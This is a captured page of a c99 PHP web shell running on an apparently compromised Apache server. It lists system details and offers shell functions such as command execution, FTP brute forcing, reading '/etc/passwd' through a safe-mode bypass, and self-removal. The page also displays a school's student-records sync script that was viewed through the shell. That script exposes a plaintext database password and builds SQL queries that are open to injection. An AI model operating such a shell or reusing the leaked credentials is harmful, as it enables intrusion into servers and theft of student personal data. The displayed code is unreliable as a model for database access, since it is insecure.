!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/sendstudent/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     demo.php (4.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
ini_set('include_path','/var/www/sekret:.');
include_once("eregis.inc");

header("content-type: text/html; charset=UTF-8");
# configuration for database
$_config['database']['hostname'] = $DBHOST;
$_config['database']['username'] = $DBUSER_EREGIS;
$_config['database']['password'] = $DBPASS_EREGIS;
$_config['database']['database'] = $DBNAME_EREGIS;

$link = mysql_connect($_config['database']['hostname'], $_config['database']['username'], $_config['database']['password']);
$objDB = mysql_select_db($_config['database']['database']);
mysql_query("SET NAMES UTF8");
if (!$link) {
    die('Could not connect: ' . mysql_error());
}
echo 'Connected successfully';

// $mysqli = new mysqli($_config['database']["hostname"],$_config['database']["username"],$_config['database']["password"],$_config['database']["database"]);
// // mysql_query ("set character_set_results='utf8'");
// mysqli_set_charset($mysqli, "utf8");

$sql = "SELECT
          rg_Student.stdId, 
          rg_Student.stdCode, 
          rg_Student.stdName, 
          rg_Student.stdSurname, 
          rg_Student.stdGPA, 
          rg_Student.stdAdY, 
          rg_Student.stdAdmitDate, 
          rg_Student.stdGraduateY, 
          rg_Student.stdGraduateDate, 
          rg_Student.stdExitExam, 
          SUM(rg_StudentBehavior.sbeCutPoint) AS SumCutPoint, 
          rg_StudentStatus.sstName, 
          rg_Student.stdSstId, 
          rg_Student.stdCurId, 
          rg_Curriculum.curName
          FROM
          rg_Student
          LEFT JOIN 
          rg_StudentBehavior
          ON 
            rg_Student.stdId = rg_StudentBehavior.sbeStdId
          LEFT JOIN
          rg_StudentStatus
          ON 
            rg_Student.stdSstId = rg_StudentStatus.sstId
          LEFT JOIN
          rg_Curriculum
          ON 
            rg_Student.stdCurId = rg_Curriculum.curId
          GROUP BY
          rg_Student.stdCode";

$result = mysql_query($sql);
if (!$result) {
    die('Invalid query: ' . mysql_error());
}

    while($row = mysql_fetch_array($result)) {

    $resultData[] = array(
      'stdCode'  => $row["stdCode"],
      'stdName'  => $row["stdName"],
      'stdSurname'  => $row["stdSurname"],
      'stdGPA'  => $row["stdGPA"],
      'stdAdmitYear'  => $row["stdAdY"],
      'stdAdmitDate'  => $row["stdAdmitDate"],
      'stdGraduateYear'  => $row["stdGraduateY"],
      'stdGraduateDate'  => $row["stdGraduateDate"],
      'stdExitExam'  => $row["stdExitExam"],
      'stdStatus'  => $row["stdSstId"],
      'stdStatusName'  => $row["sstName"],
      'stdCurName'  => $row["curName"],
          );
      }

$host = "110.78.211.57";
$username = "student";
$userpassword = "xyz_OK!!!@db";
$dbname = "regist";
  
$conn = mysqli_connect($host ,$username ,$userpassword ,$dbname);
mysqli_set_charset($conn, "utf8");

if (mysqli_connect_errno())
{
	echo "Database Connect Failed : " . mysqli_connect_error();
} else {
  echo "Database Connected";
}

for ($i = 0; $i < count($resultData); $i++) {
  $sql = "INSERT INTO Student (stdCode, stdName,stdSurname,stdGPA,stdAdmitYear,stdAdmitDate,stdGraduateYear,stdGraduateDate,stdExitExam,stdStatus,stdStatusName,stdCurName)
          VALUES ('".$resultData[$i]['stdCode']."','".$resultData[$i]['stdName']."','".$resultData[$i]['stdSurname']."','".$resultData[$i]['stdGPA']."','".$resultData[$i]['stdAdmitYear']."','".$resultData[$i]['stdAdmitDate']."','".$resultData[$i]['stdGraduateYear']."','".$resultData[$i]['stdGraduateDate']."','".$resultData[$i]['stdExitExam']."','".$resultData[$i]['stdStatus']."','".$resultData[$i]['stdStatusName']."','".$resultData[$i]['stdCurName']."') 
          ON DUPLICATE KEY UPDATE 
          stdName='".$resultData[$i]['stdCode']."',
          stdSurname='".$resultData[$i]['stdSurname']."',
          stdGPA='".$resultData[$i]['stdGPA']."',
          stdAdmitYear='".$resultData[$i]['stdAdmitYear']."',
          stdAdmitDate='".$resultData[$i]['stdAdmitDate']."',
          stdGraduateYear='".$resultData[$i]['stdGraduateYear']."',
          stdGraduateDate='".$resultData[$i]['stdGraduateDate']."',
          stdExitExam='".$resultData[$i]['stdExitExam']."',
          stdStatus='".$resultData[$i]['stdStatus']."',
          stdStatusName='".$resultData[$i]['stdStatusName']."',
          stdCurName='".$resultData[$i]['stdCurName']."';
        ";
  $conn->query($sql);
}

  print("<pre>".print_r($resultData,true)."</pre>");
die();


?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--